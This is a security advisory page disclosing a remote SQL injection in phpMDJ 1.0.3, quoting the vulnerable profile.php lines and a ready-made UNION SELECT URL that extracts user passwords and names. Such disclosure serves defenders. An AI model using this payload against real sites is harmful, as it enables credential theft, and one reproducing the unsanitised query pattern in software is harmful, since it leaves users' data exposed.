phpMDJ 1.0.3 remote SQL injection

2010-01-11 / 2010-01-12
Credit: k4cp3r/Ablus
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

,------------------------, > Author : k4cp3r/Ablus ^ > Date : 05.01.2010 ^ '------------------------' ,--------------------------------------------------------------, > Vulnerable Script : phpMDJ 1.0.3 \ > Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip \ > Vulnerability : Remote Sql Injection \ '--------------------------------------------------------------' ,-------------------------------------------------------------------------------------------------------------------------------------, > Profile.php \ > Line 14 : $membre = $_GET['id']; \ > Line 15 : \ > Line 16 : $sql = "SELECT a.nom AS nGroupe, u.* FROM phpmdj_users u, phpmdj_auth a WHERE u.groupe = a.id_groupe AND u.id = $membre"; \ > \ > Injection: \ > http://site/path/profile.php?id=[SQL] \ > \ > Example: \ > http://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1-- \ '-------------------------------------------------------------------------------------------------------------------------------------'

References:

http://xforce.iss.net/xforce/xfdb/55516
http://www.securityfocus.com/bid/37698
http://www.exploit-db.com/exploits/11083
http://secunia.com/advisories/33480
http://packetstormsecurity.org/1001-exploits/phpmdj103-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top